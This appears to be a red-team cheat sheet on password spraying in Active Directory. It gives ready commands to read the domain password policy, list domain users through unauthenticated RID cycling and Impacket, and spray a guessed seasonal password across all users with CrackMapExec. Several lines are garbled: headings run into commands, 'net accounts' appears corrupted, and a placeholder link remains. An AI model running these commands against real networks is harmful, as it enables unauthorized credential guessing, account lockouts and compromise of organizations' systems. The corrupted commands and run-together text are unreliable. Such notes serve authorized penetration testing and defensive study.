Secondary Categories: 02-Credential Access, 02-Lateral Movement, 02-Privilege Escalation
When conducting internal password spraying it is important to keep in mind that this action is very loud. I also highly recommend to enumerate the domainβs password policy before beginning.
Password Policy
Enumerate Password Policy
# Get Password Policy with CrackMapExec (Unauthenticated)
cme smb $dc -u '' -p ''
# Get Password Policy with CrackMapExec
crackmapexec smb $dc -u $username -p $password --pass-pol
# Get Password Policy with Net Accounts
net accountsshe
# Enumerate the default password policy settings from the Default Domain Policy GPO
Get-ADDefaultDomainPasswordPolicyFine-Grained Password Policy
# Enumerate all FGPPs configured
Get-ADFineGrainedPasswordPolicy -Filter *
# Obtain the FGPP assigned to a specific user
Get-ADUserResultantPasswordPolicy -Identity JSmithGathering Domain Users
Once you have enumerated the password policy if you donβt already have a list of all domain users I recommend gathering this information next.
# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users
# Get List of Users with Impacket
impacket-GetADUsers $domain/$username:$password -all -dc-ip $dcSpraying
# Spray with CrackMapExec
crackmapexec smb $ip -u $username_list -p Winter2022! --continue-on-successResources:
| Title | URL |
|---|---|
| Creating a fine grained password policy | https://specopssoft.com/blog/create-fine-grained-password-policy-active-directory/ |
Also Check Out:
- PLACEHOLDER